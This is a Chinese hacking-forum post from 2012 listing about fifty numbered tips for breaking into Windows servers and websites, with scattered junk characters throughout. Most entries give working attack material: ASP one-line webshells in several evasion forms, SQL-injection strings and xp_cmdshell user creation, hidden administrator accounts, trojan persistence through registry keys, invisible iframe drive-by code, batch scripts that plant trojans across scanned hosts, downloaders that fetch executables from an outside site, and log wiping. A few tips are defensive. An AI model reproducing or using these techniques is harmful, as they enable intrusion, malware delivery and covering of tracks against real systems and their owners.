找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2391|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,2 K4 E, P4 l+ F% v
cacls C:\windows\system32 /G hqw20:R2 k7 Y, r4 i6 r" I' B
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入# l; ?  t1 a# k: m' X+ J8 m9 e% G
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F0 \, M5 r5 @8 b  v1 @9 M3 c0 [
# P% `# Y+ ~9 Z3 @# h  u
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
6 w+ ]' r/ K8 j# H
- q9 c3 d4 f# G3 D8 l: t6 `9 j3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
, w1 `+ [  {0 s& @. E
4 f" \" h- C% m# a, N4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
( [- `: @" E/ a: y. W; C) U# d6 @
% @2 w9 q8 Y7 k5、利用INF文件来修改注册表
  k( D" V) S8 O[Version]
+ q* _: H0 |( L9 }3 aSignature="$CHICAGO$"+ L! q. I% V+ Q, }
[Defaultinstall]
2 f+ T2 v9 h, Q% y* paddREG=Ating' \& j* ^2 J- o1 Q/ j
[Ating]
$ }( z: E. Y1 X# |HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
3 P( X6 }7 ^; L/ g: S以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:( A5 k! I. {; ?& S! _
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径- [, Y, {: K+ Y
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
" P& g9 t' ^/ Q: ~8 tHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU' h: j: k% a6 ?! p4 |6 X% {
HKEY_CURRENT_CONFIG 简写为 HKCC
6 T  h+ Y1 Q# m3 v% C% q+ q0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
% f9 w. d% E6 k"1"这里代表是写入或删除注册表键值中的具体数据
- |: f5 j& q5 I3 a
, A2 H- Q& V7 o3 h0 _. p6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,0 W! j4 D+ P! p# M- }* y5 n
多了一步就是在防火墙里添加个端口,然后导出其键值8 m, g# y6 L$ }  X; S" Q
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]3 S6 u7 v/ I+ o) m6 j: l
* M7 Y; ]3 I) ^, c
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
) Z/ N& h* G7 e$ [在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
6 _+ M0 @0 d- R) x5 [2 b) ~0 o( d8 J. f' p9 ?
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
# N/ n" M' o3 D6 G  L$ K7 X0 G% a' _) r
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,( j& W2 y' e' |' ?! ^( p
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
+ E8 J- p+ q  y
6 L! Q7 D. c5 C1 C) G) A10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”& b- f8 X  n# [, P% G
$ m! x3 A1 c. A, n' u  }2 ^. h
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
8 n2 W% ?, r' Z. E用法:xsniff –pass –hide –log pass.txt
+ z9 q( X8 K+ m+ j! U7 V0 G# F, J; V: F  N  m/ f! j& i3 D
12、google搜索的艺术
# n- J9 s1 Z6 W搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
* L* B; o5 l" g' e: \. n或“字符串的语法错误”可以找到很多sql注入漏洞。
( l, z( Y# s6 s. q8 m4 Q$ l0 V
# F; k# r! ^3 `; C  c0 Z! ?* {13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。: z1 T* n6 |. M, h! f
' t. h& f* g7 I4 w* H
14、cmd中输入 nc –vv –l –p 1987
2 V- s! ~$ ?6 U2 l5 s做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃7 U7 ^5 c( d0 j5 _7 L4 A

" a: I- o  X" e6 X. \, r4 S- q$ F, `15、制作T++木马,先写个ating.hta文件,内容为* k9 [) P" p1 `( c. u* N8 u
<script language="VBScript">1 A& j1 X; r7 R; E9 p( K' P1 L
set wshshell=createobject ("wscript.shell" )% H+ u3 s) s9 m0 t6 U
a=wshshell.run("你马的名称",1); M0 B- G+ c6 @+ {' c
window.close% W+ B7 U% ^' o3 d6 U2 C' m6 f
</script>  U9 ?; m7 i7 m+ F2 q: ~
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
3 Z# \9 I% j  [3 m
- F7 ~. e) c% R0 q/ J. l16、搜索栏里输入
. d9 q" q8 \$ D' Z0 y关键字%'and 1=1 and '%'='% t7 ^* d) w: _1 o* O7 ^
关键字%'and 1=2 and '%'='
2 h/ z3 O; v9 S' K" \# h比较不同处 可以作为注入的特征字符5 K1 ]$ ?" H* i' i

6 P" ]3 B1 g5 L% V17、挂马代码<html>) G5 y' H2 f0 H
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
! ?7 }+ p; \* H& ]( q</html>4 U. r) p# K* {9 X- n+ q

0 ~5 E5 C, c: j: F& w: P18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,. O) D! G  ~' L2 C% v
net localgroup administrators还是可以看出Guest是管理员来。
* O' s, T1 o8 b* [& j1 N$ n  s2 Y
7 G- N+ q6 r4 X0 y7 _19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
& P( u! q5 G3 \( S( O) L用法: 安装: instsrv.exe 服务名称 路径6 @" m: z( d) N* r) K0 C
卸载: instsrv.exe 服务名称 REMOVE
: k0 ]$ E" _! i0 Y7 K$ _, Y; |8 ^$ i: m' q$ [5 u1 F: V" _& ~$ D# G
* R# F# Y6 d) Z! q/ U- ?- N' N. p
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉/ ~* o  l# L6 B8 i! V- a
不能注入时要第一时间想到%5c暴库。
2 _3 w. q# m  m' n& F( T5 L9 ]4 R$ e& o, B" U6 W! I
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~$ K; l8 b. w* ?& v- }

) V! h! x  L9 s6 R$ v23、缺少xp_cmdshell时0 }; k% J! q- Z2 D* v( M4 r! K
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
% A: }8 A( E# m0 K$ d: o# \假如恢复不成功,可以尝试直接加用户(针对开3389的)4 Y: k- e) P0 ]- W& k
declare @o int
' `( \( }( w' F0 @exec sp_oacreate 'wscript.shell',@o out+ V$ |% P* V) \: e7 Q& l
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员0 M( P  n% r7 Z( O( A5 _

. H/ x: }; n9 v3 S4 Z) B24.批量种植木马.bat
& k' i% _- `4 C; L, p6 \% n# r6 Xfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中9 u, n8 R! ]0 b1 D- ?4 t* S# U9 O
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间; ]+ w! j) P$ U
扫描地址.txt里每个主机名一行 用\\开头
. [. U3 U  J6 J+ k3 Z  E9 T! t* Y( {( G8 i4 w
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
! s; h/ x. z" w
: g) U2 t( I( [% T7 `9 d26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.. b. ?- X( k! F7 R
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
+ s( o0 P- h; }3 a( M, m.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
3 c5 f$ V& h( O+ a! ]. v
: n. t7 `% ~( C1 l( S- ^27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP2 J* }) [# r3 M3 p7 b+ _# {% S
然后用#clear logg和#clear line vty *删除日志
. e! o7 u1 b$ l4 w" f' Y7 o; O# l: i" R: R; |) c3 r' H
28、电脑坏了省去重新安装系统的方法
7 m1 ]9 W9 _$ u6 J4 p- F3 L/ l3 ~8 P纯dos下执行,
3 M* {/ d$ V( T6 x. ]! _0 a5 Lxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config/ M6 ?# Q, K) Y" S9 M
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
3 j8 w$ C8 g" T7 `9 R  e) k) m( E- G. l5 Q
29、解决TCP/IP筛选 在注册表里有三处,分别是:
+ B2 X. `/ e% D# nHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
9 B8 z# @3 W0 b0 |' rHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip8 C: |, B  [4 C% |6 x, x
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip* s( y/ U# q: v7 Y( J
分别用
. ?  g, q( H8 u9 V" sregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip3 j. f8 K( ^0 d# F: Z
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
; c% _" {8 j1 k# {! Nregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
+ x/ X+ K' _" o8 }* a命令来导出注册表项
/ Z4 f+ l8 v# i, O7 Q8 e. @然后把三个文件里的EnableSecurityFilters"=dword:00000001,
% R& Y/ W8 ~4 E2 u6 k改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用1 ]7 E6 D' h6 \. P
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。2 L7 Z  q* y0 s! I) |+ u' n# `3 e9 l
* N4 @1 O! j) v1 m
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
4 N( ~8 F* L9 l# a" a4 `! V$ cSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
! l5 O. l' }4 |3 d  `+ h+ t; I4 x# J6 D: O
31、全手工打造开3389工具
3 m% L; K& `, _; Z8 C$ _- {打开记事本,编辑内容如下:# z; G0 F+ `: s5 w6 v( c
echo [Components] > c:\sql$ o5 H: \% p& J0 Z: l" B
echo TSEnable = on >> c:\sql  Z4 \- }9 X9 Y) [  U% N
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
: N1 X! }0 [5 y. `& k  h编辑好后存为BAT文件,上传至肉鸡,执行/ Z/ V$ W. Y: t5 B5 _. o7 m
" Y. w. g% s" F6 t
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马5 @9 a' X6 K6 r; L

8 Q9 B$ L7 n! u# H) b33、让服务器重启
8 n& l$ n' Y; b; E: c写个bat死循环:! n/ L# |7 ^' T# P8 ~: ]
@echo off
; _* X  |8 ?- n* H9 O. w:loop15 }" a# {/ n/ n7 }6 E/ ^
cls& g; Z8 ]3 U: m: ?  j& M
start cmd.exe7 [8 J  C7 ~3 m
goto loop1
( t) K0 e2 Q3 F保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
( Q! \4 m+ s, Z+ U# u7 M7 v& R! M& |' D* w4 O8 L
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
9 ^: ]+ e: o% f( t@echo off
6 b9 \) ]/ j" M. udate /t >c:/3389.txt  v+ Z9 p5 J7 O0 }+ L9 Z
time /t >>c:/3389.txt. Y$ [: E9 ]( b( a8 ?" @, l7 v1 B2 ^
attrib +s +h c:/3389.bat- @4 p( r1 Y8 G- t  j' }, O) ?
attrib +s +h c:/3389.txt
* h$ F# t' R: Z% X5 t. h9 X, l( r0 onetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt: j- K: ^; e+ @' J& a. N: |6 a4 m
并保存为3389.bat
, r5 S/ C) E! N4 s: K) i2 w打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
4 T$ a* @: y# V" T
' _8 T7 o: B. [) G4 ~  @35、有时候提不了权限的话,试试这个命令,在命令行里输入:) D; U1 j5 P0 Z* i
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
! n9 n- q+ ^6 o7 b& {# ~0 y输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。3 Y$ q/ v! N' C, x9 s. Z- v* d
* ]# Z; j$ i7 ?0 _0 K8 ?
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
% p  [. {; T2 z- Q1 {, J2 Uecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址' ^, J+ H" S$ D2 p* P/ H9 ]' P9 {
echo 你的FTP账号 >>c:\1.bat //输入账号6 H" q' L( Z0 @  n
echo 你的FTP密码 >>c:\1.bat //输入密码
- g/ g: M8 w* O3 z. i* W" I$ Techo bin >>c:\1.bat //登入; P" w- W: g+ u. c1 w' }# @; @
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
# B0 ~0 @  I1 s6 B0 X% d' ^echo bye >>c:\1.bat //退出! M3 r( s1 n" e+ r( Y( B
然后执行ftp -s:c:\1.bat即可
; M8 v; R5 t0 t. D' \0 h* \$ H8 {! p
37、修改注册表开3389两法: G' c- r/ j* V
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
% G0 K. y9 w' X1 H6 Uecho Windows Registry Editor Version 5.00 >>3389.reg, \) I, `& v. T2 b6 h6 L% o
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
8 B4 f0 U& s7 F" O+ [" f; J2 eecho "Enabled"="0" >>3389.reg
5 V) T3 x2 h) O1 u$ i% Xecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
& n' J) V7 A: Y2 R$ QNT\CurrentVersion\Winlogon] >>3389.reg* p- Y) W+ E6 t8 c% z% \6 D! ~
echo "ShutdownWithoutLogon"="0" >>3389.reg" _- c1 X/ a" ~  ~3 c& ]2 q% T
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]7 j: c1 i" a* }9 ?4 |
>>3389.reg
) n1 |. }9 B( [+ L0 Fecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
+ f% I1 c/ M2 X& @! ?" u7 fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
* Q4 u2 k2 G0 H2 ^3 t3 R>>3389.reg
- F, w' |6 m; |1 Secho "TSEnabled"=dword:00000001 >>3389.reg
% }# ~6 Q! G+ z/ {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg  _: |) ~4 J: `6 X
echo "Start"=dword:00000002 >>3389.reg( U2 G7 t# G- J4 d! y* s! n% n: Y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
- T% l! @- _& _2 G>>3389.reg0 g- M! [) x; t1 N
echo "Start"=dword:00000002 >>3389.reg2 u' \" E# q7 P3 x/ o% n
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
1 r6 S; x1 |: F! |% Uecho "Hotkey"="1" >>3389.reg! x8 F1 Y: P5 W/ u& o' |' k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% w+ W& D4 A) H# D0 Q: N$ H
Server\Wds\rdpwd\Tds\tcp] >>3389.reg" z+ F7 ]/ f9 d8 |
echo "PortNumber"=dword:00000D3D >>3389.reg
5 y+ ]3 c4 j1 f* E8 T( Secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# l) E, J7 A  ^% {5 WServer\WinStations\RDP-Tcp] >>3389.reg( u" O5 H& K8 e- C1 Z3 F1 y
echo "PortNumber"=dword:00000D3D >>3389.reg9 c9 Q% t, C: S) W  J0 Z
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
/ N$ E# H) T7 l' L# ?& P$ [(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
0 |+ j  Z( v0 o( r/ v6 E4 E% O% }因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
5 s- b+ Y$ w% a0 G( W: ^3 U% ~(2)winxp和win2003终端开启
! h4 F  L2 N" y用以下ECHO代码写一个REG文件:0 z& c( D) D- m# Q0 M3 j1 `# ^
echo Windows Registry Editor Version 5.00>>3389.reg1 n9 V6 L( s* F, \6 h3 R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal+ `) E1 @8 F  j  V% j' @5 n; B6 _
Server]>>3389.reg8 d- i# e; m7 x0 I) I
echo "fDenyTSConnections"=dword:00000000>>3389.reg
6 Q0 ^  h3 {% j( jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 Z' o- l2 M, f; z% `2 N1 _) |
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
$ G, h) A' N  u+ x, i0 |7 b, H- iecho "PortNumber"=dword:00000d3d>>3389.reg# P8 c) x: R! Y& N$ s6 j  ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal- B  y/ {# J' L2 n! P. N$ o0 w
Server\WinStations\RDP-Tcp]>>3389.reg4 T# ]+ c+ ~$ U* Q0 T
echo "PortNumber"=dword:00000d3d>>3389.reg9 i; B; c( s  o* y
然后regedit /s 3389.reg del 3389.reg! q/ s8 `9 U9 P4 U
XP下不论开终端还是改终端端口都不需重启
0 e0 w6 ^0 f+ r7 _0 t6 y6 x* o+ n
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
% c# C, x5 |+ J* n3 P" y' g4 A3 Q用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
  w" k% @- ~6 A4 e6 G+ C
/ ~6 W5 b7 K% g39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!! H8 N5 Y, m0 @% n5 x
(1)数据库文件名应复杂并要有特殊字符( b8 Y% J: L2 {9 S$ y2 K- K# m
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源& f9 q4 U8 m* L# S
将conn.asp文档中的
) n, ?! [! B, W0 p4 C: a, g$ hDBPath = Server.MapPath("数据库.mdb")
6 T+ P* @1 k) i7 e; iconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath  H2 r6 b2 K0 d2 s% _1 ~! }
2 t+ b& r3 n) A4 f
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
5 j8 o7 W$ b+ N! b  s- j5 X# @8 T/ m(3)不放在WEB目录里
% G7 z' h: I0 j+ x+ N+ S$ R% X+ |& S. ~. N
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
. x. ~3 E, \) }- N& _) d可以写两个bat文件4 w/ b* S) R! e
@echo off' H# K8 h. P+ w- Z( G/ T
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
7 L$ B, }/ [& |- m@del c:\winnt\system32\query.exe  k- Z: Q0 e) V# n+ X0 i0 r
@del %SYSTEMROOT%\system32\dllcache\query.exe
8 b6 b* w) L% \- B( I@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的- D3 r6 _' O5 W- N1 H' n# R- q) O

* G, ]1 c5 j2 d5 d' K9 w" w  g6 m2 v/ Y' Q@echo off
1 [6 T' y4 |/ Q9 q@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe7 \: ~4 z: h& x( t! U; m* q
@del c:\winnt\system32\tsadmin.exe1 |% h7 Z+ Q+ f9 D9 g* Q% n
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex+ d, C- P% P" a5 {
. ^. B" I* q" `7 I
41、映射对方盘符
* R# g& l) U+ W; f! z8 t3 ptelnet到他的机器上,
6 c) ?: |$ k# h6 {net share 查看有没有默认共享 如果没有,那么就接着运行
0 Y, M1 P' C$ _6 e8 Q1 Pnet share c$=c:7 ?" t, i8 ~0 a! e2 P
net share现在有c$. i+ R/ \' o- P+ G8 _5 N3 x
在自己的机器上运行% @: m/ o$ ~8 S, p
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K, {; R3 x0 ], p3 D" x: \

* X( F' \3 @7 Q7 o; C42、一些很有用的老知识
1 b- u, H+ ?) G; K$ v- wtype c:\boot.ini ( 查看系统版本 ). @4 L6 \  k) ?4 e3 |
net start (查看已经启动的服务)
9 ~  Z6 j: r* b3 B2 e/ A% `query user ( 查看当前终端连接 )' Z: f* S* A0 P% s" M: |/ W2 U" Q6 ~
net user ( 查看当前用户 ): l7 K* P1 a2 E* F5 x- H& D
net user 用户 密码/add ( 建立账号 )
; h$ y! h0 b( u: anet localgroup administrators 用户 /add (提升某用户为管理员)
- F; B/ H$ h6 v" Z4 X, {4 T# K8 iipconfig -all ( 查看IP什么的 )
0 F4 F$ n$ u+ p/ O5 k' xnetstat -an ( 查看当前网络状态 )
" k2 n" ], b( W$ W! T8 r4 t5 v" [, ~findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
/ E% E1 }8 @# g/ r克隆时Administrator对应1F4
) n5 x" ]7 `8 [/ `& N7 t! }2 Q! mguest对应1F5
7 ?7 m. `! |7 N+ Z9 [. g% v7 etsinternetuser对应3E81 t9 t. H, H: _
* T! U! v. O- H$ a7 H0 r  N0 w
43、如果对方没开3389,但是装了Remote Administrator Service' K; N; s7 k# C
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接$ z) ~( m. ]1 J5 |
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
( x! ]. M) e6 ?+ |2 q先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"* Q5 I0 x, [1 e5 J/ P# F" U

( p# w% S# T$ A- o44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)2 b) ~% x9 s3 Q7 ^
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
  \$ C5 q2 r8 a! G/ q  Y# H8 f( \) G& h* a6 {# |+ S
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入), A- U. [' w) k) l) q$ C! s
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open2 _) j1 {' }  w* G
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =' n6 m% }/ j; B" E2 O
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =* t3 C* c9 D; \0 F7 @% K/ d
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
8 A* Y6 i# q( {* @% S(这是完整的一句话,其中没有换行符)* g# q- D6 h  Z5 r% o; z4 F) ^
然后下载:% U: Y1 [& \& e5 d  X
cscript down.vbs http://www.hack520.org/hack.exe hack.exe( _0 v! ]% Z0 k3 o9 X2 W4 t: ]

5 C7 b. O9 J; n6 F+ E+ }46、一句话木马成功依赖于两个条件:
% T7 d$ M# B6 v1 g. ~/ C1、服务端没有禁止adodb.Stream或FSO组件
. s) O4 u6 i# \0 t1 o; d" Y2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。. p5 e% v6 a3 o
" K5 H% \7 Z2 E9 X9 U, m
47、利用DB_OWNER权限进行手工备份一句话木马的代码:2 b$ q7 P2 w( R. l1 b3 j* y. i
;alter database utsz set RECOVERY FULL--% k7 {6 P5 N1 ?/ y# D8 u
;create table cmd (a image)--7 q3 L. ?* V, E
;backup log utsz to disk = 'D:\cmd' with init--
6 |; Q  ]/ H4 |) I;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--* B% O/ X+ e, Q& I# D& C: L5 y6 Z
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
2 G9 ?5 M  ?. n1 a4 E. ^注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
, Y+ H2 K# Y4 c# Y0 ^* q4 ?9 Y) S% H4 }) q* M
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
" K) G, Z, O/ ^9 ]
( o/ @+ f. v- P; P/ k用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options9 x" k3 d' `# a% r3 u$ z
所有会话用 'all'。+ |) a, n9 j9 a8 @# f$ o
-s sessionid 列出会话的信息。
2 Z+ }6 @* _0 U7 D-k sessionid 终止会话。0 M/ Y* l  f( ?* L
-m sessionid 发送消息到会话。
' Q6 {4 w* w% b+ b! M5 k; A3 i/ l4 g, x: q& \& Z" F
config 配置 telnet 服务器参数。7 {" Z$ p  r' K4 e
  i, x5 z' G- k# i
common_options 为:* ]9 B# _* V7 ]- e
-u user 指定要使用其凭据的用户/ E5 `  ?6 m- ?# Q" ]! r5 W. L
-p password 用户密码/ w" u6 \  J' s

( R7 g9 C, ]1 _6 v8 A- Rconfig_options 为:/ z( J& C2 k; s. v
dom = domain 设定用户的默认域
: t/ a7 c: K5 Z/ T0 i* `ctrlakeymap = yes|no 设定 ALT 键的映射+ G6 S( y& D0 i4 S" k6 m
timeout = hh:mm:ss 设定空闲会话超时值  d/ n3 p) P9 d( d5 A
timeoutactive = yes|no 启用空闲会话。
/ b/ _% h; j3 o1 x" z( E! `$ vmaxfail = attempts 设定断开前失败的登录企图数。
' H4 d, P* u' C  N+ D. P( U( Y! e9 |3 [maxconn = connections 设定最大连接数。
' {) a9 |! M; [, w8 v% ~- I. O0 Aport = number 设定 telnet 端口。
+ b: Z3 g8 p' c3 b( tsec = [+/-]NTLM [+/-]passwd
6 @; x- G3 f- [) y6 t设定身份验证机构) o7 _6 t4 B6 L) x, j
fname = file 指定审计文件名。# v$ \" X$ e7 N
fsize = size 指定审计文件的最大尺寸(MB)。
2 V; T' G- I7 w9 j1 Imode = console|stream 指定操作模式。
3 {: l% b) v3 p+ X- Q" a2 Lauditlocation = eventlog|file|both
$ x3 F6 I/ n+ {指定记录地点
  r& A$ `- e) B  s6 O3 o( {audit = [+/-]user [+/-]fail [+/-]admin
( s: E" B- V1 ?
9 c- C; n) D$ ?: u5 B2 h49、例如:在IE上访问:
  z6 u0 o( e: ?www.hack520.org/hack.txt就会跳转到http://www.hack520.org/4 x% O& B2 K; `1 A: t
hack.txt里面的代码是:
) ?* B. L6 g7 p# G: I2 y0 n<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
  I  M5 _' U! ?+ V把这个hack.txt发到你空间就可以了!
( {: i( ]# G* I这个可以利用来做网马哦!
) j' k5 M1 A1 h3 g
( B) v) x5 l/ h' D: ?' ^$ T50、autorun的病毒可以通过手动限制!
) }- w7 a% k  |2 ?/ x' N2 h. f1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
+ @7 o1 K) j1 G( \+ N2,打开盘符用右键打开!切忌双击盘符~
+ v; M2 P$ I* {( `3 M3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
$ D1 n8 L1 x* n4 w8 E5 E9 n3 D$ e
51、log备份时的一句话木马:" w# e& X5 h& L4 ?, t$ o: |) e
a).<%%25Execute(request("go"))%%25>+ H  g2 O% H0 |
b).<%Execute(request("go"))%>5 \. `' O+ A) k
c).%><%execute request("go")%><%# n$ b- x  k- h3 h! ~/ V0 Z& v' f
d).<script language=VBScript runat=server>execute request("sb")</Script>
